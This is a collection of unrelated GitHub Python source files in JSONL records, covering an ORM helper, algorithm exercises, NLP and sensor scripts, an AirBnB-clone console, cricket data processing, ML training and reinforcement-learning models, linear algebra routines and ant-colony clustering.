if self._cache is None:\n polymorphic, self._polymorphic = self._polymorphic, False\n self._cache = list(self.iterator())\n self._cache = PopulatePolymorphic(self._cache, self.mapper.get_mapper).compute()\n self.populate_prefetch()\n self._polymorphic = polymorphic\n return self\n\n def iterator(self):\n for obj in super(PolymorphicResult, self).iterator():\n yield obj.concrete_instance if self._polymorphic and hasattr(obj, 'concrete_instance') else obj\n\n\nclass PopulatePolymorphic(object):\n\n def __init__(self, rows, mapper_accessor):\n self._rows = rows\n self._get_mapper = mapper_accessor\n\n def compute(self):\n if not self._rows:\n return []\n return self._get_populated_rows()\n\n def _get_populated_rows(self):\n rows = self._rows[:]\n typed_objects = self._get_typed_objects()\n for i, obj in enumerate(rows):\n if obj.polymorphic_type_id in typed_objects:\n rows[i] = typed_objects[obj.polymorphic_type_id][self._get_current_mapper().get_pk(obj)]\n return rows\n\n def _get_typed_objects(self):\n typed_objects = {}\n pks = {self._get_current_mapper().get_pk(i) for i in self._rows}\n for ct in self._get_content_types():\n mapper = self._get_mapper(ct)\n typed_objects[ct] = {mapper.get_pk(i): i for i in mapper.query.where(mapper.sql_table.pk.in_(pks))}\n return typed_objects\n\n def _get_current_mapper(self):\n current_model = self._rows[0].__class__\n return self._get_mapper(current_model)\n\n def _get_content_types(self):\n content_types = {i.polymorphic_type_id for i in self._rows}\n content_types -= {self._get_current_mapper().name}\n return content_types\n\n\nclass PolymorphicLoad(Load):\n def _map_data_from_db(self, data, columns=None):\n columns = columns or self._mapper.polymorphic_columns\n return super(PolymorphicLoad, self)._map_data_from_db(data, columns)\n","repo_name":"emacsway/ascetic","sub_path":"ascetic/contrib/polymorphic.py","file_name":"polymorphic.py","file_ext":"py","file_size_in_byte":7432,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"35"} +{"seq_id":"72002102180","text":"import sys\nsys.setrecursionlimit(10000)\n# 상하좌우 움직임 저장\ndx = [1,-1, 0, 0]\ndy = [0, 0, 1, -1]\n\ndef dfs(y, x):\n visited[y][x] = True\n for i in range(4):\n rx = dx[i] + x\n ry = dy[i] + y\n if rx < 0 or rx >= m or ry < 0 or ry >= n:\n continue\n if world[ry][rx] == 1 and not visited[ry][rx]:\n dfs(ry, rx)\n\nt = int(input())\n\nfor _ in range(t):\n m, n, k = map(int, input().split())\n # 유기농 배추의 world를 생성\n world = [[0] * m for _ in range(n)]\n visited = [[False] * m for _ in range(n)]\n cnt = 0\n\n # 유기농 배추가 있는 곳에 1을 표시\n for i in range(k):\n x, y = map(int, input().split())\n world[y][x] = 1\n\n # dfs()를 통해서 유기농 배추를 지렁이로 관리할 수 있는 구역 개수 구하기\n for i in range(n):\n for j in range(m):\n if world[i][j] == 1 and not visited[i][j]:\n dfs(i, j)\n cnt += 1\n print(cnt)","repo_name":"YUL-git/Python-Coding","sub_path":"백준/DFS BFS/beck_1012 유기농 배추.py","file_name":"beck_1012 유기농 배추.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41063439876","text":"import nltk\r\nimport re\r\nimport time\r\nimport pprint\r\nimport urllib\r\nfrom pymongo import MongoClient\r\n\r\nclient = MongoClient()\r\ndb = client.shuffled_DB2\r\n\r\n# This is to get the type of a tuple\r\ntup = (1, 2, 3)\r\n\r\n# Types of named entities that can be recognized from the tweet\r\nentities = [\"ORGANIZATION\", \"PERSON\", \"LOCATION\", \"DATE\", \"TIME\", \"MONEY\", \"PERCENT\", \"FACILITY\", \"GPE\"]\r\n\r\ndef checkForNamedEntities(tree):\r\n # This means the node is a tuple\r\n if(type(tree) == type(tup)):\r\n return False\r\n else:\r\n tag = tree.label()\r\n if(tag in entities):\r\n return True \r\n else:\r\n found = False\r\n for node in tree:\r\n if(checkForNamedEntities(node)):\r\n found = True\r\n return True\r\n \r\n\r\n\r\n\r\ndef checkNER(tweetsList):\r\n for tweet in tweetsList:\r\n # Tokenize the words in the given tweet\r\n tokenized = nltk.word_tokenize(tweet)\r\n\r\n # Identify the parts of speech of each token\r\n tagged = nltk.pos_tag(tokenized)\r\n\r\n #Identify named entites using the parts of speech from the Tweet\r\n tree = nltk.ne_chunk(tagged)\r\n if(checkForNamedEntities(tree)):\r\n return True\r\n else:\r\n return False\r\n ","repo_name":"anmolshkl/Breaking-News-Detection-on-Twitter","sub_path":"LSH/ner.py","file_name":"ner.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"35"} +{"seq_id":"29829580274","text":"# function to get readings from wifi temp & humidity sensor\n\nfrom __main__ import *\nimport requests\n\ndef getWifiTempHumidityReadings(input_dict):\n logger = logging.getLogger('getWifiTempHumidityReadings')\n logger.addHandler(handler)\n logger.setLevel(logging.DEBUG)\n\n # initialize output dict\n response_dict = {}\n\n for s in input_dict:\n logger.debug(s)\n logger.info(\"Current sensor name: %s\" % s)\n logger.info(\"Current sensor config ID: %s\" % input_dict[s]['config_id'])\n r = requests.get(input_dict[s]['url'])\n response = r.text\n logger.debug(\"Raw binary response: %s\" % response.encode('utf-8'))\n response = response.replace('\\r', '')\n list_data = response.split(\",\")\n if input_dict[s]['version'] == 1:\n sensor_type = list_data[0]\n temperature = list_data[1]\n humidity = list_data[2]\n elif input_dict[s]['version'] == 2:\n sensor_type = list_data[1]\n temperature = list_data[2]\n humidity = list_data[3]\n else:\n logger.error(\"Unsupported sensor version\")\n logger.debug(\"Parameter 1 =%s\" % sensor_type)\n logger.debug(\"Parameter 2 =%s\" % temperature)\n logger.debug(\"Parameter 3 =%s\" % humidity)\n\n # build response dict\n response_dict[s] = {}\n response_dict[s]['temperature'] = temperature\n response_dict[s]['humidity'] = humidity\n\n return response_dict\n\n\nif __name__ == \"__main__\":\n import logging\n log_name = 'privateEyePiSensorTest.log'\n logger = logging.getLogger('privateEyePiSensorTest.py')\n handler = logging.FileHandler('privateEyePiSensorTest.log')\n formatter = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s')\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n logger.setLevel(logging.DEBUG)\n\n logger.info(\"Main started\")\n\n sensor_dict = {}\n #sensor_dict['sensor_qty'] = 1\n sensor_dict['ESP_1853FE'] = {}\n sensor_dict['ESP_1853FE']['config_id'] = 'sensor.1'\n sensor_dict['ESP_1853FE']['url'] = 'http://192.168.0.184/temp'\n sensor_dict['ESP_1853FE']['version'] = 2\n logger.debug(sensor_dict)\n \n x = getWifiTempHumidityReadings(sensor_dict)\n logger.debug(x)\n logger.info(\"Main finished\")","repo_name":"ericloeliger/python-common-modules","sub_path":"privateEyePiSensor.py","file_name":"privateEyePiSensor.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34116439593","text":"#!/usr/bin/python3\n\n\"\"\"\nA command line interpreter for our AirBnB clone project\n\"\"\"\n\nimport cmd\nimport models\nfrom models import storage\nfrom models.base_model import BaseModel\nfrom models.amenity import Amenity\nfrom models.user import User\nfrom models.state import State\nfrom models.city import City\nfrom models.place import Place\nfrom models.review import Review\n\nclasses = {'BaseModel': BaseModel, 'User': User, 'Place': Place,\n 'State': State, 'City': City, 'Amenity': Amenity, 'Review': Review}\n\n\nclass HBNBCommand(cmd.Cmd):\n \"\"\"Airbnb_clone console\"\"\"\n\n prompt = '(hbnb) '\n\n def __init__(self, completekey='tab', stdin=None, stdout=None):\n \"\"\"init method\"\"\"\n\n super().__init__(completekey, stdin, stdout)\n\n def do_EOF(self, line):\n \"\"\"End of The File\"\"\"\n\n return True\n\n def do_quit(self, line):\n \"\"\"Quit command to exit the program\"\"\"\n\n return True\n\n def emptyline(self):\n \"\"\"an empty line + ENTER shouldn’t execute anything\"\"\"\n\n pass\n\n def do_create(self, args):\n \"\"\"Creates a new instance of BaseModel,\n saves it (to the JSON file) and prints the id\"\"\"\n\n if not (args):\n print(\"** class name missing **\")\n elif args not in HBNBCommand.classes:\n print(\"** class doesn't exist **\")\n else:\n instance = eval[args]()\n instance.save()\n print(instance.id)\n\n def do_show(self, args):\n \"\"\"Prints the string representation of an instance\n based on the class name and id\"\"\"\n\n if not (args):\n print(\"** class name missing **\")\n else:\n args = args.split()\n if len(args) != 2:\n print(\"** instance id missing **\")\n elif args[0] not in classes:\n print(\"** class doesn't exist **\")\n else:\n for k, v in storage.all().items():\n if args[1] == v.id:\n print(v)\n return\n print(\"** no instance found **\")\n\n def do_destroy(self, args):\n \"\"\"Deletes an instance based on the class name\n and id (save the change into the JSON file).\"\"\"\n\n args = args.split()\n if not args:\n print(\"** class name missing **\")\n return\n elif len(args) < 2:\n print(\"** instance id missing **\")\n return\n if args[0] not in classes:\n print(\"** class doesn't exist **\")\n return\n for k, v in storage.all().items():\n if args[1] == v.id:\n del storage.all()[k]\n storage.save()\n return\n print(\"** no instance found **\")\n\n def do_all(self, args):\n \"\"\"Prints all string representation of all instances\n based or not on the class name.\"\"\"\n\n if args == \"\":\n print([x.__str__() for x in models.storage.all().values()])\n else:\n try:\n model = models.classes[args]\n resp = []\n for x in models.storage.all().values():\n if type(x) == model:\n resp.append(x.__str__())\n print(resp)\n except Exception as e:\n print(e)\n\n def do_update(self, args):\n \"\"\"Updates an instance based on the class name and\n id by adding or updating attribute\n (save the change into the JSON file).\"\"\"\n\n args = args.split()\n if len(args) == 0:\n print(\"** class name missing **\")\n return False\n if args[0] in classes:\n if len(args) > 1:\n key = args[0] + '.' + args[1]\n if key in storage.all():\n if len(args) > 2:\n if len(args) > 3:\n setattr(storage.all()[key], args[2], args[3])\n storage.all()[key].save()\n else:\n print(\"** value missing **\")\n else:\n print(\"** attribute name missing **\")\n else:\n print(\"** no instance found **\")\n else:\n print(\"** instance id missing **\")\n else:\n print(\"** class doesn't exist **\")\n\n\nif __name__ == '__main__':\n HBNBCommand().cmdloop()\n","repo_name":"FranklineMisango/AirBnB_clone","sub_path":"console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":4408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71961237221","text":"# ----------------------------------------------------------------------------------------------------------------------\nfrom BST_01_build import BST_from_list\nfrom BST_03_is_balanced import get_height\nfrom BST_02_print import print_BST\nimport numpy\n# ----------------------------------------------------------------------------------------------------------------------\ndef traverse_for_depth_pos(node,depth,pos):\n\n if node.L is None and node.R is None:\n return [depth],[pos]\n levels,positions = [],[]\n if node.L is not None:\n levels,positions = traverse_for_depth_pos(node.L,depth+1,2*pos)\n\n levels.append(depth)\n positions.append(pos)\n\n if node.R is not None:\n l,p= traverse_for_depth_pos(node.R,depth+1,2*pos+1)\n levels+=l\n positions+=p\n\n return levels, positions\n# ----------------------------------------------------------------------------------------------------------------------\ndef max_width(root):\n\n level,pos = traverse_for_depth_pos(root,0,0)\n pos = numpy.array(pos)\n level = numpy.array(level)\n max_depth = 0\n for each in set(level):\n idx = numpy.where(level==each)\n d = numpy.max(pos[idx])-numpy.min(pos[idx])\n max_depth = max(max_depth,d)\n\n return max_depth\n# ----------------------------------------------------------------------------------------------------------------------\n\nif __name__ == '__main__':\n A = list('jqpxldy')\n\n #root = BST_from_list(A)\n #res = max_width(root)\n #print(res)\n\n B=u'sdfsfsdf'\n BB = list(B.encode('utf-8'))\n C = [chr(each) for each in BB]\n D = ''.join(C)\n print(D)\n\n\n\n","repo_name":"dryabokon/algo","sub_path":"BST_08_max_width.py","file_name":"BST_08_max_width.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"27493705287","text":"\n# this code takes the csv versions of the cricsheet.org data for t20i and league matches\n# it produces two csvs: a stacked version of all the ball-by-ball (bbb) data and the result and toss of each match\n# it adds a few new columns depicting game state (wickets, runs etc.) and removes games with no result, tie or super-over result.\n\n#---------------standard packages------------------\nimport numpy as np\nimport pandas as pd\nimport datetime as dt\nfrom tqdm import tqdm\nfrom pathlib import Path\n\n#-----------------zip processors-------------------\nfrom io import BytesIO\nfrom zipfile import ZipFile\nfrom urllib.request import urlopen\n\n#-------------------csv readers--------------------\nimport csv\nfrom io import TextIOWrapper\n\n#----------------league dictionary-----------------\nleague_dict = {'ntb':'Vitality Blast', 'ipl':'Indian Premier League',\n 'cpl':'Carribean Premier League', 'psl':'Pakistan Super League',\n 'bbl':'Big Bash League', 't20s':'T20 Internationals'}\n \n#----------------fetch bbb data--------------------\ndef cricsheet_fetch(url):\n\n zipfile = ZipFile(BytesIO(urlopen(url).read()))\n ziplist = zipfile.namelist()\n\n ziplist.remove('README.txt')\n if 'all_matches.csv' in ziplist:\n ziplist.remove('all_matches.csv')\n \n league = league_dict[url.split('_')[-3].split('/')[-1]]\n \n def file_row(file):\n row_dict = {}\n reader = csv.reader(TextIOWrapper(zipfile.open(file), 'utf-8'))\n row_dict['match_id'] = file.replace('_info.csv','')\n\n team_names = []\n for row in reader:\n if 'toss_winner' in row:\n row_dict['toss_winner'] = row[-1]\n elif 'winner' in row:\n row_dict['result'] = row[-1]\n elif 'outcome' in row:\n row_dict['result'] = row[-1]\n elif 'team' in row:\n team_names.append(row[-1])\n row_dict['match_name'] = team_names[0] + ' v ' + team_names[1]\n return row_dict\n\n results = pd.DataFrame.from_dict([file_row(file) for file in ziplist\n if 'info' in file]).set_index('match_id').rename_axis(index=None)\n \n results = results[~results['result'].isin(['tie','no result'])] #remove draws\n\n match_stack = pd.concat([pd.read_csv(zipfile.open(file), dtype = {'ball':str, 'match_id':str},\n parse_dates = ['start_date']) for file in ziplist \n if 'info' not in file and file in results.index + '.csv'], ignore_index=True)\n\n match_stack.insert(1, 'league', league)\n \n out = (match_stack['player_dismissed'] == match_stack['striker']) | (\n match_stack['other_player_dismissed'] == match_stack['striker'])\n \n match_stack.insert(7, 'out', out)\n \n#---------------game state features----------------\n ball_no = pd.DataFrame(match_stack['ball'].str.split('.').tolist()).astype('int')\n match_stack.insert(6, 'ball_no', ball_no[0]*6 + ball_no[1].clip(upper = 6))\n\n match_stack['runs'] = match_stack['runs_off_bat'] + match_stack['extras']\n match_stack['wickets'] = match_stack['wicket_type'].notna() + match_stack['other_wicket_type'].notna()\n \n game_state = match_stack.groupby(['match_id', 'innings']).cumsum()[['runs','wickets']]\n match_stack = match_stack.join(game_state, lsuffix = '_0')\n \n runs = match_stack.pop('runs')\n wickets = match_stack.pop('wickets')\n \n match_stack.insert(8, 'runs', runs - match_stack['runs_0'])\n match_stack.insert(9, 'wickets', wickets - match_stack['wickets_0'])\n match_stack.drop(['runs_0', 'wickets_0'], axis = 1, inplace = True)\n \n#--------------------icc filter--------------------\n icc_teams=['Australia', 'England', 'Bangladesh',' India', 'Pakistan','South Africa',\n 'New Zealand', 'West Indies', 'Sri Lanka', 'Afghanistan', 'Zimbabwe',\n 'Netherlands','Scotland', 'Ireland']\n\n if league == 'T20 Internationals':\n match_stack = match_stack[match_stack['batting_team'].isin(icc_teams) & \n match_stack['bowling_team'].isin(icc_teams)]\n \n results = results[results.index.isin(match_stack['match_id'].unique())]\n \n match_stack.reset_index(inplace = True, drop = True)\n\n results = results.merge(match_stack[match_stack['innings'] == 1].drop_duplicates('match_id'),\n left_index = True, right_on = 'match_id').set_index('match_id')\n\n results = results[['start_date', 'league', 'venue', 'match_name',\n 'batting_team', 'bowling_team','toss_winner', 'result']].rename(columns = {'batting_team':'set_team',\n 'bowling_team':'chase_team'})\n return match_stack, results\n\n#-------------loop over leagues/t20i---------------\ndef multi_fetch(leagues = ['ntb', 'ipl', 'cpl', 'psl', 'bbl', 't20s']):\n \n match_stack_list, results_list = [], []\n for league in tqdm(leagues):\n match_stack, results = cricsheet_fetch('https://cricsheet.org/downloads/' + league + '_male_csv2.zip')\n match_stack_list.append(match_stack)\n results_list.append(results)\n\n pd.concat(match_stack_list,ignore_index = True).to_csv(Path('data/master/master_data.csv'),index = False)\n pd.concat(results_list).to_csv(Path('data/master/master_results.csv'))\n \n#-------------------run script---------------------\nmulti_fetch()","repo_name":"caiodrear/gayle","sub_path":"code/data_processing/cricsheet_fetch.py","file_name":"cricsheet_fetch.py","file_ext":"py","file_size_in_byte":5526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"24297630241","text":"#!/usr/bin/env python\n\n\"\"\"\nLittle library to help converting input arguments to scripts\ninto a list.\nThe input arguments can be a list of items and/or read from a file\nExamples:\n $ myprogram a b c\n\n $ myprogram --file f\n $ cat f\n a\n b\n c\n\n $ myprogram --file f z x y\n\"\"\"\nimport braceexpand\nimport argparse\n\ndef expand(arg):\n \"\"\"\n expand bash-like arguments compressed in brackets.\n Examples:\n foo_{01,02,03}_bar --> foo_01_bar foo_02_bar foo_03_bar\n \"foo_{01..03}_bar\" --> foo_01_bar foo_02_bar foo_03_bar !! Note the quotes !!\n input: string\n output: list\n \"\"\"\n return list( braceexpand.braceexpand(arg) )\n\n\ndef getlist(args_l):\n parser = argparse.ArgumentParser()\n parser.add_argument('--file')\n parser.add_argument('items', nargs='*')\n args, unknown = parser.parse_known_args(args_l)\n out = args.items\n out = _parse_positional(args.items)\n if args.file:\n # there could be more than one file, split by comma\n for filename in args.file.split(','):\n out = _parse_file(out, filename)\n return out\n\ndef _parse_positional(arg_l):\n out = []\n for arg in arg_l:\n new_arg_l = expand(arg)\n for new_arg in new_arg_l:\n if new_arg not in out:\n out.append(new_arg)\n return out\n\ndef _parse_file(out, filename):\n f = open(filename)\n for line in f.readlines():\n line = line.strip()\n if line.startswith('#'):\n continue\n if line == '':\n continue\n arg_l = expand(line)\n for arg in arg_l:\n if arg not in out:\n out.append(arg)\n return out\n","repo_name":"jose-caballero/craftpy","sub_path":"itemlist.py","file_name":"itemlist.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4967968001","text":"import os\nimport sys\nsys.path.append('..')\nfrom model_base import Model\nfrom tqdm import tqdm\nfrom transformers import AdamW, get_linear_schedule_with_warmup\nimport torch\nfrom sklearn.metrics import classification_report, f1_score, recall_score, precision_score, accuracy_score\n\n\ndef train(config, train_iter, dev_iter):\n model = Model(config).to(config.device)\n bert_param_optimizer = list(model.pre_model.named_parameters())\n\n no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']\n optimizer_grouped_parameters = [\n {\n 'params':[param for n,param in bert_param_optimizer if not any(nd in n for nd in no_decay)],\n 'weight_decay': 0.01,\n 'lr': config.bert_learning_rate\n },\n {\n 'params': [p for n, p in bert_param_optimizer if any(nd in n for nd in no_decay)],\n 'weight_decay': 0.0,\n \"lr\": config.bert_learning_rate\n }\n ]\n optimizer = AdamW(params = optimizer_grouped_parameters,\n betas = (0.9, 0.98),\n lr = config.bert_learning_rate,\n eps = 1e-8)\n\n scheduler = get_linear_schedule_with_warmup(optimizer,\n num_warmup_steps = int(len(train_iter) * config.train_epoch * config.warmup_prop),\n num_training_steps = len(train_iter) * config.train_epoch)\n\n # 训练\n cum_step = 0\n for i in range(config.train_epoch):\n model.train()\n for input_ids, attention_mask, token_type_ids, labels, tokens_cpu in tqdm(train_iter, position=0, ncols=80, desc='训练中'):\n loss = model.forward(input_ids, attention_mask, token_type_ids, labels)\n loss.backward()\n optimizer.step()\n scheduler.step()\n model.zero_grad()\n cum_step += 1\n\n # 验证\n f1, p, r = set_eval(config, model, dev_iter)\n\n # 保存模型\n model_to_save = model.module if hasattr(model,'module') else model\n output_model_file = os.path.join(\n os.path.join(config.model_save_path, 'model_{:.4f}_{:.4f}_{:.4f}_{}.bin'.format(p, r, f1, str(cum_step)))\n )\n torch.save(model_to_save, output_model_file)\n\ndef set_eval(config, model, dev_iter):\n model.eval()\n true_label_list, pred_label_list = [], []\n for input_ids, attention_mask, token_type_ids in tqdm(dev_iter, position=0, ncols=80, desc='验证中'):\n prob, pred = model.forward(input_ids, attention_mask, token_type_ids, labels=None)\n\n labels = labels.cpu().numpy()\n pred = pred.cpu().numpy()\n true_label_list.extend(labels)\n pred_label_list.extend(pred)\n\n # 评价指标\n f1 = f1_score(y_true=true_label_list, y_pred=pred_label_list, average='macro')\n p = precision_score(y_true=true_label_list, y_pred=pred_label_list, average='macro')\n r = recall_score(y_true=true_label_list, y_pred=pred_label_list, average='macro')\n\n # 评估结果写入logger\n config.logger.info(report)\n config.logger.info('precision: {}, recall {}, f1 {}'.format(p, r, f1))\n\n return f1, p, r","repo_name":"languandong/question_matching_pytorch","sub_path":"total_utils/train_utils.py","file_name":"train_utils.py","file_ext":"py","file_size_in_byte":3137,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"14350055856","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\n\nclass CommNet(nn.Module):\n '''\n Implements CommNet for a single building\n Of the CityLearn challenge\n LSTM version with skip connection for the final layer\n\n TODO: Try basic version without LSTM / alter skip connections etc\n But might be a better idea to explore more advanced architectures instead\n '''\n\n def __init__(\n self, \n agent_number, # Number of buildings present\n input_size, # Observation accessible to each building (assuming homogenous)\n hidden_size = 10, # Hidden vector accessible at each communication step\n comm_size = 4, # Number of communication channels\n comm_steps = 2 # Number of communication steps\n ):\n \n super(CommNet, self).__init__()\n\n self.device = 'cpu'\n self.input_size = input_size\n self.comm_size = comm_size\n self.agent_number = agent_number\n self.comm_steps = comm_steps\n\n # Calculate first hidden layer \n self._in_mlp = nn.Sequential(\n nn.Linear(input_size,input_size),\n nn.LeakyReLU(),\n nn.BatchNorm1d(input_size),\n nn.Linear(input_size,input_size),\n nn.LeakyReLU(),\n nn.BatchNorm1d(input_size),\n nn.Linear(input_size,hidden_size)\n )\n\n # Communication \n self._lstm = nn.LSTMCell(\n input_size = comm_size,\n hidden_size = hidden_size\n )\n\n self._comm_mlp = nn.Sequential(\n nn.Linear(hidden_size,hidden_size),\n nn.LeakyReLU(),\n nn.Linear(hidden_size,comm_size)\n )\n\n # Output\n # Calculate based on inputs and final memory\n self._out_mlp = nn.Sequential(\n nn.Linear(input_size+hidden_size, input_size+hidden_size),\n nn.LeakyReLU(),\n nn.Linear(input_size+hidden_size, input_size+hidden_size),\n nn.LeakyReLU(),\n nn.Linear(input_size+hidden_size, 1),\n nn.Tanh()\n )\n\n\n def forward(self,x : torch.Tensor, batch = False):\n\n out = None\n if not batch:\n\n # (Building, Observations)\n \n # Initial hidden states\n hidden_states = self._in_mlp(x)\n cell_states = torch.zeros(hidden_states.shape,device=self.device)\n\n # Communication\n for t in range(self.comm_steps):\n # Calculate communication vectors\n comm = self._comm_mlp(hidden_states)\n total_comm = torch.sum(comm,0)\n comm = (total_comm - comm) / (self.agent_number-1)\n # Apply LSTM \n hidden_states, cell_states = self._lstm(comm,(hidden_states,cell_states))\n \n out = self._out_mlp(torch.cat((x,hidden_states),dim=1))\n else:\n # (Batch, Building, Observation)\n out = torch.stack([self.forward(a) for a in x])\n\n return out\n\n def to(self,device):\n super().to(device)\n self.device = device\n\nclass SingleCritic(nn.Module):\n\n def __init__(self,\n input_size, \n action_size = 1,\n hidden_layer_size = 32):\n super(SingleCritic, self).__init__()\n\n self.input_size = input_size\n self.action_size = action_size\n\n self._in_mlp = nn.Sequential(\n nn.Linear(input_size + action_size, hidden_layer_size),\n nn.LeakyReLU(),\n nn.Linear(hidden_layer_size, hidden_layer_size),\n nn.LeakyReLU(),\n nn.Linear(hidden_layer_size, 1),\n )\n\n def forward (self, state, action):\n x = torch.cat((torch.flatten(state,start_dim=1),torch.flatten(action,start_dim=1)),dim=1)\n return self._in_mlp(x)\n\nfrom sklearn.preprocessing import MinMaxScaler\n\nclass MinMaxNormalizer:\n\n def __init__(self, obs_dict):\n observation_space = obs_dict['observation_space'][0]\n low, high = observation_space['low'],observation_space['high']\n \n self.scalar = MinMaxScaler()\n self.scalar.fit([low,high])\n\n def transform(self, x):\n return self.scalar.transform(x)\n\n\n# Experience replay needs a memory - this is it!\n# Double stack implementation of a queue - https://stackoverflow.com/questions/69192/how-to-implement-a-queue-using-two-stacks\nclass Queue: \n a = []\n b = []\n \n def enqueue(self, x):\n self.a.append(x)\n \n def dequeue(self):\n if len(self.b) == 0:\n while len(self.a) > 0:\n self.b.append(self.a.pop())\n if len(self.b):\n return self.b.pop()\n\n def __len__(self):\n return len(self.a) + len(self.b)\n\n def __getitem__(self, i):\n if i >= self.__len__():\n raise IndexError\n if i < len(self.b):\n return self.b[-i-1]\n else:\n return self.a[i-len(self.b)]\n\n","repo_name":"leomuckley/city-learn-2022","sub_path":"comm_net.py","file_name":"comm_net.py","file_ext":"py","file_size_in_byte":5071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74329380580","text":"from playLA.LinearSystem import rank\nfrom .Vector import Vector\nfrom .Matrix import Matrix\n\n\ndef gram_schmidt_process(basis):\n matrix = Matrix(basis)\n assert rank(matrix) == len(basis)\n\n res = [basis[0]]\n for i in range(1, len(basis)):\n p = basis[i]\n for r in res:\n p = p - basis[i].dot(r) / r.dot(r) * r\n res.append(p)\n return res\n\n\ndef qr(A: Matrix):\n\n assert A.row_num() == A.col_num(), \"A must be square\"\n\n basis = [A.col_vector(i) for i in range(0, A.col_num())]\n P = gram_schmidt_process(basis)\n Q = Matrix([v / v.norm() for v in P]).T()\n R = Q.T().dot(A)\n\n return Q, R\n\n\n# 求向量b在矩阵A的列空间上的投影\ndef least_squares(A: Matrix, b: Vector):\n # 求正交基\n basis = [A.col_vector(i) for i in range(0, A.col_num())]\n P = gram_schmidt_process(basis)\n\n res = Vector.zero(len(b))\n for p in P:\n res = res + b.dot(p) / p.dot(p) * p\n return res\n","repo_name":"DaoLinZhou/learning-linear-algebra","sub_path":"playLA/GramSchmidtProcess.py","file_name":"GramSchmidtProcess.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"9900470451","text":"from undirected_graph import UndirectedGraph\nfrom cluster import Cluster\nfrom random import randint\nfrom random import uniform\n\ndef aco_sol_cluster(graph: UndirectedGraph, cluster_count: int):\n matr = {}\n for node in graph.nodes():\n matr[node] = {}\n for cluster in range(1, cluster_count+1):\n matr[node][cluster] = 100\n\n for iteration in range(1000):\n print('Iteration ' + str(iteration))\n\n solution = {}\n for node in graph.nodes():\n total = sum(matr[node].values())\n choise = uniform(0, total-1)\n cluster = 1\n while matr[node][cluster] < choise:\n choise -= matr[node][cluster]\n cluster += 1\n solution[node] = cluster\n\n clusters = {}\n for c in range(1, cluster_count+1):\n clusters[c] = Cluster(graph, [])\n\n for node in solution.keys():\n clusters[solution[node]].add(node)\n\n mod_dens = 0\n for cluster in clusters.values():\n mod_dens += cluster.modularity_density()\n\n for node in solution.keys():\n cl = solution[node]\n matr[node][cl] += (mod_dens + clusters[cl].modularity_density() / 5) /5\n if matr[node][cl] == 0:\n matr[node][cl] = 0\n\n cluster_list = []\n for c in range(1, cluster_count+1):\n clust = Cluster(graph, [])\n for node in graph.nodes():\n if max(matr[node].values()) == matr[node][c]:\n clust.add(node)\n cluster_list.append(clust)\n\n print(' ', end='')\n for node in graph.nodes():\n print(node, ' ', end='')\n print('')\n for c in range(1, cluster_count+1):\n print(c, ' ', end='')\n for node in graph.nodes():\n print(\"%.2f\" % matr[node][c], ' ', end='')\n print('')\n\n return cluster_list\n\ndef aco_graph_cluster(graph: UndirectedGraph):\n edges = {}\n steps = 0\n for node in graph.nodes():\n for neigh in graph.neighbors(node):\n edges[(node, neigh)] = 10\n edges[(neigh, node)] = 10\n steps += 1\n steps = int(0.1 * steps / 100) + 1\n nodes = [node for node in graph.nodes()]\n\n for iteration in range(1000):\n print('Iteration ' + str(iteration))\n\n for i in range(len(nodes)):\n ant = nodes[randint(0, len(nodes)-1)]\n # print('Node ' + str(nodes[i]))\n # ant = nodes[i]\n for step in range(steps):\n next_nodes = graph.neighbors(ant)\n if len(next_nodes) == 0:\n continue\n # print(next_nodes)\n prob = [edges[(ant, n)] for n in next_nodes]\n # print('prob:',prob)\n total = sum(prob)\n prob = [p / total for p in prob]\n direction = uniform(0, 1)\n while direction > prob[0]:\n direction -= prob[0]\n next_nodes = next_nodes[1:]\n prob = prob[1:]\n next_node = next_nodes[0]\n # print('next_node ', next_node)\n edges[(next_node, ant)] += 0.1\n edges[(ant, next_node)] += 0.1\n ant = next_node\n\n suma = 0\n for i in range(len(nodes)):\n for j in range(i+1, len(nodes)):\n if (nodes[i], nodes[j]) in edges:\n print(str(nodes[i]) + ',' + str(nodes[j]) + ' : ' + str(edges[(nodes[i], nodes[j])]))\n suma += edges[(nodes[i], nodes[j])]\n suma = 2 * suma / len(edges)\n print(suma)\n\n cluster_list = []\n while len(nodes) != 0:\n node = nodes.pop()\n clust = Cluster(graph, [node])\n vecini = []\n for neigh in graph.neighbors(node):\n if (node, neigh) in edges and edges[(node, neigh)] > 0.9 * suma:\n vecini.append(neigh)\n clust.add(neigh)\n if neigh in nodes:\n nodes.remove(neigh)\n del edges[(node, neigh)]\n del edges[(neigh, node)]\n while len(vecini) != 0:\n n = vecini.pop()\n for neigh in graph.neighbors(n):\n if (n, neigh) in edges and edges[(n, neigh)] > 0.9 * suma and neigh not in clust:\n vecini.append(neigh)\n clust.add(neigh)\n if neigh in nodes:\n nodes.remove(neigh)\n del edges[(n, neigh)]\n del edges[(neigh, n)]\n cluster_list.append(clust)\n\n return 